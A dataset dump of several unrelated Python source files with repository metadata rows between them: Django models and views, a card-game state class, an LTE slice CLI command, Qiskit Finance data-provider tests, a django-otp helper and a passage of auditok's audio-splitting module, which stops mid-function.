f_game_name = models.CharField(primary_key=False, max_length=100, default="dgame")
f_player = models.CharField(max_length=100)
f_time = models.DateTimeField(default = datetime.now)
f_play_time = models.DecimalField(default = 0, max_digits = 10, decimal_places = 3)
#mt_ball.meta
class Meta:
ordering = ['f_game_name']
#mt_ball.methods
def get_absolute_url(self):
return reverse('mt_iq', args=[str(self.id)])
def __str__(self):
return self.f_game_name
#model:mt_player
class mt_player(models.Model):
#mt_ball.fields
f_player_name = models.CharField(primary_key=False, max_length=100, default="player")
f_g_iq_avg_time = models.DecimalField(default = 0, max_digits = 10, decimal_places = 3)
f_g_iq_best_time = models.DecimalField(default = 0, max_digits = 10, decimal_places = 3)
f_g_iq_no_games = models.IntegerField(default = 1)
#mt_ball.meta
class Meta:
ordering = ['f_player_name']
#mt_ball.methods
def get_absolute_url(self):
return reverse('mt_player', args=[str(self.id)])
def __str__(self):
return self.f_player_name
| 32.078571 | 97 | 0.764863 |
4600724508364a1d56a810feb294edee747f1b6b | 848 | py | Python | state.py | shreshthtuli/Achieve31 | 966fbd8b40d3a300b92adff6613d1a28bacc3272 | [
"MIT"
] | null | null | null | state.py | shreshthtuli/Achieve31 | 966fbd8b40d3a300b92adff6613d1a28bacc3272 | [
"MIT"
] | null | null | null | state.py | shreshthtuli/Achieve31 | 966fbd8b40d3a300b92adff6613d1a28bacc3272 | [
"MIT"
] | null | null | null | from utils import *
class State:
def __init__(self, dealer, mySum=0):
self.oneTwoThree = [False, False, False]
self.special = 0
self.sum = mySum
self.dealer = dealer
def action(self, card):
# print("Card = ", card)
if card <= 3 and card > 0 and not self.oneTwoThree[card-1]:
self.oneTwoThree[card-1] = True
self.special += 1
self.sum += card
def score(self):
score = self.sum
for i in range(self.special):
if score <= 21:
score += 10
return score
def runDealer(self):
while self.dealer < 25 and self.dealer >= 0:
self.dealer += draw()
def __str__(self):
return str(self.special) + ", " + str(self.sum) + ", " + str(self.score()) + ", " + str(self.dealer)
| 28.266667 | 108 | 0.522406 |
b06a6ffa4ae8f366c04af8241ee5d07488d86502 | 1,585 | py | Python | empower/cli/lteslices_commands/delete_lte_slice.py | ericbrinckhaus/empower-runtime-modified | ecd7c1e9f1c19a629abdcb5c55257377313246ea | [
"Apache-2.0"
] | null | null | null | empower/cli/lteslices_commands/delete_lte_slice.py | ericbrinckhaus/empower-runtime-modified | ecd7c1e9f1c19a629abdcb5c55257377313246ea | [
"Apache-2.0"
] | null | null | null | empower/cli/lteslices_commands/delete_lte_slice.py | ericbrinckhaus/empower-runtime-modified | ecd7c1e9f1c19a629abdcb5c55257377313246ea | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright (c) 2019 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""LTE Slices CLI tools."""
import uuid
import argparse
from empower.cli import command
def pa_cmd(args, cmd):
"""Delete LTE slice parser method. """
usage = "%s <options>" % command.USAGE.format(cmd)
desc = command.DESCS[cmd]
parser = argparse.ArgumentParser(usage=usage, description=desc)
required = parser.add_argument_group('required named arguments')
required.add_argument('-p', '--project_id', help='The project id',
required=True, type=uuid.UUID, dest="project_id")
required.add_argument('-s', '--slice_id', help='The slice id',
required=True, type=int, dest="slice_id")
(args, leftovers) = parser.parse_known_args(args)
return args, leftovers
def do_cmd(gargs, args, _):
"""Delete LTE slice. """
url = '/api/v1/projects/%s/lte_slices/%s' % \
(args.project_id, args.slice_id)
command.connect(gargs, ('DELETE', url), 204)
print(args.slice_id)
| 28.818182 | 75 | 0.682019 |
c4cbb51422a76ecfb5555ef1ebcca4f34a37b1f2 | 2,298 | py | Python | hoods/views.py | badruu/neighborhood | 85d30f7451f921c533dc4463aad76ed2d39f8023 | [
"MIT"
] | null | null | null | hoods/views.py | badruu/neighborhood | 85d30f7451f921c533dc4463aad76ed2d39f8023 | [
"MIT"
] | 6 | 2021-03-19T01:10:18.000Z | 2022-03-11T23:49:18.000Z | hoods/views.py | badruu/neighborhood | 85d30f7451f921c533dc4463aad76ed2d39f8023 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404, HttpResponseRedirect
import datetime as dt
from .models import Hoods, Business
from users.models import Profile
from .forms import *
from django.contrib.auth.decorators import login_required
@login_required(login_url="/users/login/")
def index(request):
users = Profile.objects.all()
current_user=request.user
hoods = Hoods.objects.all()
businesses = Business.objects.all()
return render(request, 'hoods/index.html', {"current_user":current_user, "businesses":businesses, "hoods":hoods, "users":users})
@login_required(login_url="/users/login/")
def createneighbourhood(request):
'''
View function for new service page
'''
current_user=request.user
admin=Profile.objects.get(user=current_user)
user = Profile.objects.get(user=current_user)
hoods = user.neighbourhood_id
if request.method == 'POST':
form = NeighbourhoodForm(request.POST, request.FILES)
if form.is_valid():
hoods = form.save(commit=False)
hoods.admin = current_user
hoods.population = 1
hoods.timestamp = timezone.now()
hoods.save()
return redirect('welcome')
else:
form = NeighbourhoodForm()
return render(request, 'hoods/hoodform.html', {"form":form, "current_user":current_user, "admin":admin, "user":user, "hoods":hoods})
@login_required(login_url="/users/login/")
def createbusiness(request):
'''
View function for new service page
'''
current_user=request.user
admin=Profile.objects.get(user=current_user)
user = Profile.objects.get(user=current_user)
biznas = user.business_id
hoods = user.neighbourhood_id
if request.method == 'POST':
form = BusinessForm(request.POST, request.FILES)
if form.is_valid():
biznas = form.save(commit=False)
biznas.user = current_user
biznas.hood_id = hoods
biznas.timestamp = timezone.now()
biznas.save()
return redirect('welcome')
else:
form = BusinessForm()
return render(request, 'hoods/businessform.html', {"form":form, "current_user":current_user, "admin":admin, "user":user, "biznas":biznas}) | 35.90625 | 142 | 0.67537 |
6bcaf858720334420cf6a5768c5cfa8cce603e67 | 600 | py | Python | tests/test_cli.py | OpenCorpora/opencorpora-tools | a4064b911347cbb1ded88e108e135186aeeb27e9 | [
"MIT"
] | 3 | 2017-02-24T17:25:28.000Z | 2019-02-27T22:09:54.000Z | tests/test_cli.py | OpenCorpora/opencorpora-tools | a4064b911347cbb1ded88e108e135186aeeb27e9 | [
"MIT"
] | null | null | null | tests/test_cli.py | OpenCorpora/opencorpora-tools | a4064b911347cbb1ded88e108e135186aeeb27e9 | [
"MIT"
] | 1 | 2020-10-18T21:38:21.000Z | 2020-10-18T21:38:21.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import mock
import unittest
import tempfile
from opencorpora import cli
class CliTest(unittest.TestCase):
@mock.patch('opencorpora.cli.urlopen')
def test_download(self, urlopen):
urlopen.return_value.read.return_value = ''
with tempfile.NamedTemporaryFile() as f:
class Args(object):
output = f.name
no_decompress = False
url = ''
disambig = False
quiet = False
args = Args()
cli.download(args)
| 27.272727 | 51 | 0.588333 |
b96acdd4c0d3a9105bc459a96bbde7b13053eb66 | 10,971 | py | Python | test/finance/test_data_providers.py | charmerDark/qiskit-aqua | c1564af8792c6664670807614a378147fd04d28f | [
"Apache-2.0"
] | 83 | 2018-07-25T02:45:48.000Z | 2018-12-15T15:34:14.000Z | test/finance/test_data_providers.py | charmerDark/qiskit-aqua | c1564af8792c6664670807614a378147fd04d28f | [
"Apache-2.0"
] | 84 | 2018-07-24T13:30:37.000Z | 2018-12-14T20:22:23.000Z | test/finance/test_data_providers.py | charmerDark/qiskit-aqua | c1564af8792c6664670807614a378147fd04d28f | [
"Apache-2.0"
] | 42 | 2018-07-26T01:53:13.000Z | 2018-12-07T16:30:19.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2019, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Data Providers """
import unittest
import os
import datetime
from test.finance import QiskitFinanceTestCase
import warnings
from ddt import ddt, data, unpack
import numpy as np
from qiskit.aqua import MissingOptionalLibraryError
from qiskit.finance import QiskitFinanceError
from qiskit.finance.data_providers import (RandomDataProvider,
WikipediaDataProvider,
YahooDataProvider,
StockMarket,
DataOnDemandProvider,
ExchangeDataProvider)
# This can be run as python -m unittest test.test_data_providers.TestDataProviders
@ddt
class TestDataProviders(QiskitFinanceTestCase):
"""Tests data providers for the Portfolio Optimization and Diversification."""
def setUp(self):
super().setUp()
warnings.filterwarnings(action="ignore", message="unclosed", category=ResourceWarning)
self._quandl_token = os.getenv('QUANDL_TOKEN') if os.getenv('QUANDL_TOKEN') else ''
self._on_demand_token = os.getenv('ON_DEMAND_TOKEN') if os.getenv('ON_DEMAND_TOKEN') else ''
def tearDown(self):
super().tearDown()
warnings.filterwarnings(action="always", message="unclosed", category=ResourceWarning)
def test_random_wrong_use(self):
""" Random wrong use test """
try:
rnd = RandomDataProvider(seed=1)
# Now, the .run() method is expected, which does the actual data loading
# (and can take seconds or minutes,
# depending on the data volumes, hence not ok in the constructor)
with self.subTest('test RandomDataProvider get_covariance_matrix'):
self.assertRaises(QiskitFinanceError, rnd.get_covariance_matrix)
with self.subTest('test RandomDataProvider get_similarity_matrix'):
self.assertRaises(QiskitFinanceError, rnd.get_similarity_matrix)
wiki = WikipediaDataProvider(
token=self._quandl_token,
tickers=["GOOG", "AAPL"],
start=datetime.datetime(2016, 1, 1),
end=datetime.datetime(2016, 1, 30)
)
# Now, the .run() method is expected, which does the actual data loading
with self.subTest('test WikipediaDataProvider get_covariance_matrix'):
self.assertRaises(QiskitFinanceError, wiki.get_covariance_matrix)
with self.subTest('test WikipediaDataProvider get_similarity_matrix'):
self.assertRaises(QiskitFinanceError, wiki.get_similarity_matrix)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
def test_yahoo_wrong_use(self):
""" Yahoo! wrong use test """
try:
yahoo = YahooDataProvider(
tickers=["AEO", "ABBY"],
start=datetime.datetime(2018, 1, 1),
end=datetime.datetime(2018, 12, 31)
)
# Now, the .run() method is expected, which does the actual data loading
with self.subTest('test YahooDataProvider get_covariance_matrix'):
self.assertRaises(QiskitFinanceError, yahoo.get_covariance_matrix)
with self.subTest('test YahooDataProvider get_similarity_matrix'):
self.assertRaises(QiskitFinanceError, yahoo.get_similarity_matrix)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
def test_random(self):
""" random test """
similarity = np.array([[1.00000000e+00, 6.2284804e-04], [6.2284804e-04, 1.00000000e+00]])
covariance = np.array([[2.08413157, 0.20842107], [0.20842107, 1.99542187]])
try:
rnd = RandomDataProvider(seed=1)
rnd.run()
with self.subTest('test RandomDataProvider get_covariance_matrix'):
np.testing.assert_array_almost_equal(rnd.get_covariance_matrix(),
covariance, decimal=3)
with self.subTest('test RandomDataProvider get_similarity_matrix'):
np.testing.assert_array_almost_equal(rnd.get_similarity_matrix(),
similarity, decimal=3)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
def test_random_divide_0(self):
""" Random divide by 0 test """
# This will create data with some 0 values, it should not throw
# divide by 0 errors
try:
seed = 8888
num_assets = 4
stocks = [("TICKER%s" % i) for i in range(num_assets)]
random_data = RandomDataProvider(
tickers=stocks,
start=datetime.datetime(2016, 1, 1),
end=datetime.datetime(2016, 1, 30),
seed=seed,
)
random_data.run()
mu_value = random_data.get_period_return_mean_vector()
sigma_value = random_data.get_period_return_covariance_matrix()
with self.subTest("test get_period_return_mean_vector is numpy array"):
self.assertIsInstance(mu_value, np.ndarray)
with self.subTest("test get_period_return_covariance_matrix is numpy array"):
self.assertIsInstance(sigma_value, np.ndarray)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
def test_wikipedia(self):
""" wikipedia test """
try:
wiki = WikipediaDataProvider(
token=self._quandl_token,
tickers=["GOOG", "AAPL"],
start=datetime.datetime(2016, 1, 1),
end=datetime.datetime(2016, 1, 30)
)
wiki.run()
similarity = np.array([
[1.00000000e+00, 8.44268222e-05],
[8.44268222e-05, 1.00000000e+00]
])
covariance = np.array([
[269.60118129, 25.42252332],
[25.42252332, 7.86304499]
])
with self.subTest('test WikipediaDataProvider get_covariance_matrix'):
np.testing.assert_array_almost_equal(wiki.get_covariance_matrix(),
covariance, decimal=3)
with self.subTest('test WikipediaDataProvider get_similarity_matrix'):
np.testing.assert_array_almost_equal(wiki.get_similarity_matrix(),
similarity, decimal=3)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
except QiskitFinanceError as ex:
self.skipTest("Test of WikipediaDataProvider skipped: {}".format(str(ex)))
# The trouble for automating testing is that after 50 tries
# from one IP address within a day
# Quandl complains about the free usage tier limits:
# quandl.errors.quandl_error.LimitExceededError: (Status 429) (Quandl Error QELx01)
# You have exceeded the anonymous user limit of 50 calls per day. To make more calls
# today, please register for a free Quandl account and then include your API
# key with your requests.
# This gets "dressed" as QiskitFinanceError.
# This also introduces a couple of seconds of a delay.
def test_nasdaq(self):
""" nasdaq test """
try:
nasdaq = DataOnDemandProvider(
token=self._on_demand_token,
tickers=["GOOG", "AAPL"],
start=datetime.datetime(2016, 1, 1),
end=datetime.datetime(2016, 1, 2)
)
nasdaq.run()
except QiskitFinanceError as ex:
self.skipTest("Test of DataOnDemandProvider skipped {}".format(str(ex)))
def test_exchangedata(self):
""" exchange data test """
try:
lse = ExchangeDataProvider(
token=self._quandl_token,
tickers=["AEO", "ABBY"],
stockmarket=StockMarket.LONDON,
start=datetime.datetime(2018, 1, 1),
end=datetime.datetime(2018, 12, 31)
)
lse.run()
similarity = np.array([
[1.00000000e+00, 8.44268222e-05],
[8.44268222e-05, 1.00000000e+00]
])
covariance = np.array(
[[2.693, -18.65],
[-18.65, 1304.422]])
with self.subTest('test ExchangeDataProvider get_covariance_matrix'):
np.testing.assert_array_almost_equal(lse.get_covariance_matrix(),
covariance, decimal=3)
with self.subTest('test ExchangeDataProvider get_similarity_matrix'):
np.testing.assert_array_almost_equal(lse.get_similarity_matrix(),
similarity, decimal=3)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
except QiskitFinanceError as ex:
self.skipTest("Test of ExchangeDataProvider skipped {}".format(str(ex)))
@data(
[["AEO", "AEP"], [[7.0, 1.0], [1.0, 15.0]], [[1.0e00, 9.2e-05], [9.2e-05, 1.0e00]]],
["AEO", 7.0, [[1.0]]],
)
@unpack
def test_yahoo(self, tickers, covariance, similarity):
""" Yahoo data test """
try:
yahoo = YahooDataProvider(
tickers=tickers,
start=datetime.datetime(2018, 1, 1),
end=datetime.datetime(2018, 12, 31),
)
yahoo.run()
with self.subTest("test YahooDataProvider get_covariance_matrix"):
np.testing.assert_array_almost_equal(
yahoo.get_covariance_matrix(), np.array(covariance), decimal=0
)
with self.subTest("test YahooDataProvider get_similarity_matrix"):
np.testing.assert_array_almost_equal(
yahoo.get_similarity_matrix(), np.array(similarity), decimal=1
)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
except QiskitFinanceError as ex:
self.skipTest("Test of YahooDataProvider skipped {}".format(str(ex)))
if __name__ == '__main__':
unittest.main()
| 45.903766 | 100 | 0.591286 |
7cf0b4ccfab00fe4f6789c04ff855ff4d0b22f78 | 532 | py | Python | deformetrica/core/observations/__init__.py | coolteemf/coolteemf-deformetrica | f965d6ecc0d04f243e487468a9dafe9fe864eed2 | [
"MIT"
] | 2 | 2022-03-04T11:19:30.000Z | 2022-03-08T04:47:22.000Z | deformetrica/core/observations/__init__.py | lepennec/Deformetrica_multiscale | dbcb69962dd02f14dde5d63a9abc1de69112f273 | [
"MIT"
] | null | null | null | deformetrica/core/observations/__init__.py | lepennec/Deformetrica_multiscale | dbcb69962dd02f14dde5d63a9abc1de69112f273 | [
"MIT"
] | 1 | 2022-03-07T09:52:52.000Z | 2022-03-07T09:52:52.000Z |
# dataset
from .datasets.longitudinal_dataset import LongitudinalDataset
# landmarks
from .deformable_objects.landmarks.landmark import Landmark
from .deformable_objects.landmarks.point_cloud import PointCloud
from .deformable_objects.landmarks.poly_line import PolyLine
from .deformable_objects.landmarks.surface_mesh import SurfaceMesh
# deformable objects
from .deformable_objects.deformable_multi_object import DeformableMultiObject
from .deformable_objects.image import Image
# from .deformable_objects.scalar import Scalar
| 35.466667 | 77 | 0.87406 |
e0a1ab755643a07eb5778ec7df6803ed4f9bed98 | 689 | py | Python | src/django_otp/plugins/otp_static/lib.py | jaap3/django-otp | d7980bf516018319158570cc75353c905375a3ab | [
"BSD-2-Clause"
] | 318 | 2019-08-27T15:57:05.000Z | 2022-03-30T08:38:29.000Z | src/django_otp/plugins/otp_static/lib.py | jaap3/django-otp | d7980bf516018319158570cc75353c905375a3ab | [
"BSD-2-Clause"
] | 77 | 2019-09-17T11:48:38.000Z | 2022-03-13T17:26:56.000Z | src/django_otp/plugins/otp_static/lib.py | jaap3/django-otp | d7980bf516018319158570cc75353c905375a3ab | [
"BSD-2-Clause"
] | 76 | 2019-08-30T20:29:40.000Z | 2022-03-30T09:14:36.000Z | from django.contrib.auth import get_user_model
from .models import StaticDevice, StaticToken
def add_static_token(username, token=None):
"""
Adds a random static token to the identified user.
This is the implementation for the management command of a similar name.
Returns the StaticToken object created.
"""
user = get_user_model().objects.get_by_natural_key(username)
device = next(StaticDevice.objects.filter(user=user).iterator(), None)
if device is None:
device = StaticDevice.objects.create(user=user, name='Backup Code')
if token is None:
token = StaticToken.random_token()
return device.token_set.create(token=token)
| 28.708333 | 76 | 0.728592 |
795cdd96ffb7ec24409923999a5e32771fed4d26 | 52,902 | py | Python | auditok/core.py | phrase-loop-player/auditok | 7f08e14d482d624edb1498867400862f9d881ecf | [
"MIT"
] | null | null | null | auditok/core.py | phrase-loop-player/auditok | 7f08e14d482d624edb1498867400862f9d881ecf | [
"MIT"
] | null | null | null | auditok/core.py | phrase-loop-player/auditok | 7f08e14d482d624edb1498867400862f9d881ecf | [
"MIT"
] | null | null | null | """
.. autosummary::
:toctree: generated/
load
split
AudioRegion
StreamTokenizer
"""
import os
import math
from .util import AudioReader, DataValidator, AudioEnergyValidator
from .io import check_audio_data, to_file, player_for, get_audio_source
from .exceptions import TooSamllBlockDuration
try:
from . import signal_numpy as signal
except ImportError:
from . import signal
__all__ = ["load", "split", "AudioRegion", "StreamTokenizer"]
DEFAULT_ANALYSIS_WINDOW = 0.05
DEFAULT_ENERGY_THRESHOLD = 50
_EPSILON = 1e-10
def load(input, skip=0, max_read=None, **kwargs):
"""Load audio data from a source and return it as an :class:`AudioRegion`.
Parameters
----------
input : None, str, bytes, AudioSource
source to read audio data from. If `str`, it should be a path to a
valid audio file. If `bytes`, it is used as raw audio data. If it is
"-", raw data will be read from stdin. If None, read audio data from
the microphone using PyAudio. If of type `bytes` or is a path to a
raw audio file then `sampling_rate`, `sample_width` and `channels`
parameters (or their alias) are required. If it's an
:class:`AudioSource` object it's used directly to read data.
skip : float, default: 0
amount, in seconds, of audio data to skip from source. If read from
a microphone, `skip` must be 0, otherwise a `ValueError` is raised.
max_read : float, default: None
amount, in seconds, of audio data to read from source. If read from
microphone, `max_read` should not be None, otherwise a `ValueError` is
raised.
audio_format, fmt : str
type of audio data (e.g., wav, ogg, flac, raw, etc.). This will only
be used if `input` is a string path to an audio file. If not given,
audio type will be guessed from file name extension or from file
header.
sampling_rate, sr : int
sampling rate of audio data. Required if `input` is a raw audio file,
a `bytes` object or None (i.e., read from microphone).
sample_width, sw : int
number of bytes used to encode one audio sample, typically 1, 2 or 4.
Required for raw data, see `sampling_rate`.
channels, ch : int
number of channels of audio data. Required for raw data, see
`sampling_rate`.
large_file : bool, default: False
If True, AND if `input` is a path to a *wav* of a *raw* audio file
(and **only** these two formats) then audio file is not fully loaded to
memory in order to create the region (but the portion of data needed to
create the region is of course loaded to memory). Set to True if
`max_read` is significantly smaller then the size of a large audio file
that shouldn't be entirely loaded to memory.
Returns
-------
region: AudioRegion
Raises
------
ValueError
raised if `input` is None (i.e., read data from microphone) and `skip`
!= 0 or `input` is None `max_read` is None (meaning that when reading
from the microphone, no data should be skipped, and maximum amount of
data to read should be explicitly provided).
"""
return AudioRegion.load(input, skip, max_read, **kwargs)
def split(
input,
min_dur=0.2,
max_dur=5,
max_silence=0.3,
drop_trailing_silence=False,
strict_min_dur=False,
**kwargs
):
"""
Split audio data and return a generator of AudioRegions
Parameters
----------
input : str, bytes, AudioSource, AudioReader, AudioRegion or None
input audio data. If str, it should be a path to an existing audio file.
"-" is interpreted as standard input. If bytes, input is considered as
raw audio data. If None, read audio from microphone.
Every object that is not an `AudioReader` will be transformed into an
`AudioReader` before processing. If it is an `str` that refers to a raw
audio file, `bytes` or None, audio parameters should be provided using
kwargs (i.e., `samplig_rate`, `sample_width` and `channels` or their
alias).
If `input` is str then audio format will be guessed from file extension.
`audio_format` (alias `fmt`) kwarg can also be given to specify audio
format explicitly. If none of these options is available, rely on
backend (currently only pydub is supported) to load data.
min_dur : float, default: 0.2
minimun duration in seconds of a detected audio event. By using large
values for `min_dur`, very short audio events (e.g., very short 1-word
utterances like 'yes' or 'no') can be mis detected. Using very short
values might result in a high number of short, unuseful audio events.
max_dur : float, default: 5
maximum duration in seconds of a detected audio event. If an audio event
lasts more than `max_dur` it will be truncated. If the continuation of a
truncated audio event is shorter than `min_dur` then this continuation
is accepted as a valid audio event if `strict_min_dur` is False.
Otherwise it is rejected.
max_silence : float, default: 0.3
maximum duration of continuous silence within an audio event. There
might be many silent gaps of this duration within one audio event. If
the continuous silence happens at the end of the event than it's kept as
part of the event if `drop_trailing_silence` is False (default).
drop_trailing_silence : bool, default: False
Whether to remove trailing silence from detected events. To avoid abrupt
cuts in speech, trailing silence should be kept, therefore this
parameter should be False.
strict_min_dur : bool, default: False
strict minimum duration. Do not accept an audio event if it is shorter
than `min_dur` even if it is contiguous to the latest valid event. This
happens if the the latest detected event had reached `max_dur`.
Other Parameters
----------------
analysis_window, aw : float, default: 0.05 (50 ms)
duration of analysis window in seconds. A value between 0.01 (10 ms) and
0.1 (100 ms) should be good for most use-cases.
audio_format, fmt : str
type of audio data (e.g., wav, ogg, flac, raw, etc.). This will only be
used if `input` is a string path to an audio file. If not given, audio
type will be guessed from file name extension or from file header.
sampling_rate, sr : int
sampling rate of audio data. Required if `input` is a raw audio file, is
a bytes object or None (i.e., read from microphone).
sample_width, sw : int
number of bytes used to encode one audio sample, typically 1, 2 or 4.
Required for raw data, see `sampling_rate`.
channels, ch : int
number of channels of audio data. Required for raw data, see
`sampling_rate`.
use_channel, uc : {None, "mix"} or int
which channel to use for split if `input` has multiple audio channels.
Regardless of which channel is used for splitting, returned audio events
contain data from *all* channels, just as `input`.
The following values are accepted:
- None (alias "any"): accept audio activity from any channel, even if
other channels are silent. This is the default behavior.
- "mix" ("avg" or "average"): mix down all channels (i.e. compute
average channel) and split the resulting channel.
- int (0 <=, > `channels`): use one channel, specified by integer id,
for split.
large_file : bool, default: False
If True, AND if `input` is a path to a *wav* of a *raw* audio file
(and only these two formats) then audio data is lazily loaded to memory
(i.e., one analysis window a time). Otherwise the whole file is loaded
to memory before split. Set to True if the size of the file is larger
than available memory.
max_read, mr : float, default: None, read until end of stream
maximum data to read from source in seconds.
validator, val : callable, DataValidator
custom data validator. If `None` (default), an `AudioEnergyValidor` is
used with the given energy threshold. Can be a callable or an instance
of `DataValidator` that implements `is_valid`. In either case, it'll be
called with with a window of audio data as the first parameter.
energy_threshold, eth : float, default: 50
energy threshold for audio activity detection. Audio regions that have
enough windows of with a signal energy equal to or above this threshold
are considered valid audio events. Here we are referring to this amount
as the energy of the signal but to be more accurate, it is the log
energy of computed as: `20 * log10(sqrt(dot(x, x) / len(x)))` (see
:class:`AudioEnergyValidator` and
:func:`calculate_energy_single_channel`). If `validator` is given, this
argument is ignored.
Yields
------
AudioRegion
a generator of detected :class:`AudioRegion` s.
"""
if min_dur <= 0:
raise ValueError("'min_dur' ({}) must be > 0".format(min_dur))
if max_dur <= 0:
raise ValueError("'max_dur' ({}) must be > 0".format(max_dur))
if max_silence < 0:
raise ValueError("'max_silence' ({}) must be >= 0".format(max_silence))
if isinstance(input, AudioReader):
source = input
analysis_window = source.block_dur
else:
analysis_window = kwargs.get(
"analysis_window", kwargs.get("aw", DEFAULT_ANALYSIS_WINDOW)
)
if analysis_window <= 0:
raise ValueError(
"'analysis_window' ({}) must be > 0".format(analysis_window)
)
params = kwargs.copy()
params["max_read"] = params.get("max_read", params.get("mr"))
params["audio_format"] = params.get("audio_format", params.get("fmt"))
if isinstance(input, AudioRegion):
params["sampling_rate"] = input.sr
params["sample_width"] = input.sw
params["channels"] = input.ch
input = bytes(input)
try:
source = AudioReader(input, block_dur=analysis_window, **params)
except TooSamllBlockDuration as exc:
err_msg = "Too small 'analysis_windows' ({0}) for sampling rate "
err_msg += "({1}). Analysis windows should at least be 1/{1} to "
err_msg += "cover one single data sample"
raise ValueError(err_msg.format(exc.block_dur, exc.sampling_rate))
validator = kwargs.get("validator", kwargs.get("val"))
if validator is None:
energy_threshold = kwargs.get(
"energy_threshold", kwargs.get("eth", DEFAULT_ENERGY_THRESHOLD)
)
use_channel = kwargs.get("use_channel", kwargs.get("uc"))
validator = AudioEnergyValidator(
energy_threshold, source.sw, source.ch, use_channel=use_channel
)
mode = StreamTokenizer.DROP_TRAILING_SILENCE if drop_trailing_silence else 0
if strict_min_dur:
mode |= StreamTokenizer.STRICT_MIN_LENGTH
min_length = _duration_to_nb_windows(min_dur, analysis_window, math.ceil)
max_length = _duration_to_nb_windows(
max_dur, analysis_window, math.floor, _EPSILON
)
max_continuous_silence = _duration_to_nb_windows(
max_silence, analysis_window, math.floor, _EPSILON
)
err_msg = "({0} sec.) results in {1} analysis window(s) "
err_msg += "({1} == {6}({0} / {2})) which is {5} the number "
err_msg += "of analysis window(s) for 'max_dur' ({3} == floor({4} / {2}))"
if min_length > max_length:
err_msg = "'min_dur' " + err_msg
raise ValueError(
err_msg.format(
min_dur,
min_length,
analysis_window,
max_length,
max_dur,
"higher than",
"ceil",
)
)
if max_continuous_silence >= max_length:
err_msg = "'max_silence' " + err_msg
raise ValueError(
err_msg.format(
max_silence,
max_continuous_silence,
analysis_window,
max_length,
max_dur,
"higher or equal to",
"floor",
)
)
tokenizer = StreamTokenizer(
validator, min_length, max_length, max_continuous_silence, mode=mode
)
source.open()
token_gen = tokenizer.tokenize(source, generator=True)
region_gen = (
_make_audio_region_meta(
token[0],
token[1],
source.block_dur,
source.sr,
source.sw,
source.ch,
)
for token in token_gen
)
return region_gen
def _duration_to_nb_windows(
duration, analysis_window, round_fn=round, epsilon=0
):
"""
Converts a given duration into a positive integer of analysis windows.
if `duration / analysis_window` is not an integer, the result will be
rounded to the closest bigger integer. If `duration == 0`, returns `0`.
If `duration < analysis_window`, returns 1.
`duration` and `analysis_window` can be in seconds or milliseconds but
must be in the same unit.
Parameters
----------
duration : float
a given duration in seconds or ms.
analysis_window: float
size of analysis window, in the same unit as `duration`.
round_fn : callable
function called to round the result. Default: `round`.
epsilon : float
small value to add to the division result before rounding.
E.g., `0.3 / 0.1 = 2.9999999999999996`, when called with
`round_fn=math.floor` returns `2` instead of `3`. Adding a small value
to `0.3 / 0.1` avoids this error.
Returns
-------
nb_windows : int
minimum number of `analysis_window`'s to cover `durartion`. That means
that `analysis_window * nb_windows >= duration`.
"""
if duration < 0 or analysis_window <= 0:
err_msg = "'duration' ({}) must be >= 0 and 'analysis_window' ({}) > 0"
raise ValueError(err_msg.format(duration, analysis_window))
if duration == 0:
return 0
return int(round_fn(duration / analysis_window + epsilon))
def _make_audio_region_meta(
data_frames,
start_frame,
frame_duration,
sampling_rate,
sample_width,
channels,
):
"""
Helper function to create an `AudioRegion` from parameters returned by
tokenization object. It takes care of setting up region `start` and `end`
in metadata.
Parameters
----------
frame_duration: float
duration of analysis window in seconds
start_frame : int
index of the fisrt analysis window
samling_rate : int
sampling rate of audio data
sample_width : int
number of bytes of one audio sample
channels : int
number of channels of audio data
Returns
-------
audio_region : AudioRegion
AudioRegion whose start time is calculeted as:
`1000 * start_frame * frame_duration`
"""
start = start_frame * frame_duration
data = b"".join(data_frames)
duration = len(data) / (sampling_rate * sample_width * channels)
meta = {"start": start, "end": start + duration}
return meta
def _read_chunks_online(max_read, **kwargs):
"""
Helper function to read audio data from an online blocking source
(i.e., microphone). Used to build an `AudioRegion` and can intercept
KeyboardInterrupt so that reading stops as soon as this exception is
raised. Makes building `AudioRegion`s on [i]python sessions and jupyter
notebooks more user friendly.
Parameters
----------
max_read : float
maximum amount of data to read in seconds.
kwargs :
audio parameters (sampling_rate, sample_width and channels).
See also
--------
`AudioRegion.build`
"""
reader = AudioReader(None, block_dur=0.5, max_read=max_read, **kwargs)
reader.open()
data = []
try:
while True:
frame = reader.read()
if frame is None:
break
data.append(frame)
except KeyboardInterrupt:
# Stop data acquisition from microphone when pressing
# Ctrl+C on a [i]python session or a notebook
pass
reader.close()
return (
b"".join(data),
reader.sampling_rate,
reader.sample_width,
reader.channels,
)
def _read_offline(input, skip=0, max_read=None, **kwargs):
"""
Helper function to read audio data from an offline (i.e., file). Used to
build `AudioRegion`s.
Parameters
----------
input : str, bytes
path to audio file (if str), or a bytes object representing raw audio
data.
skip : float, default 0
amount of data to skip from the begining of audio source.
max_read : float, default: None
maximum amount of audio data to read. Default: None, means read until
end of stream.
kwargs :
audio parameters (sampling_rate, sample_width and channels).
See also
--------
`AudioRegion.build`
"""
audio_source = get_audio_source(input, **kwargs)
audio_source.open()
if skip is not None and skip > 0:
skip_samples = round(skip * audio_source.sampling_rate)
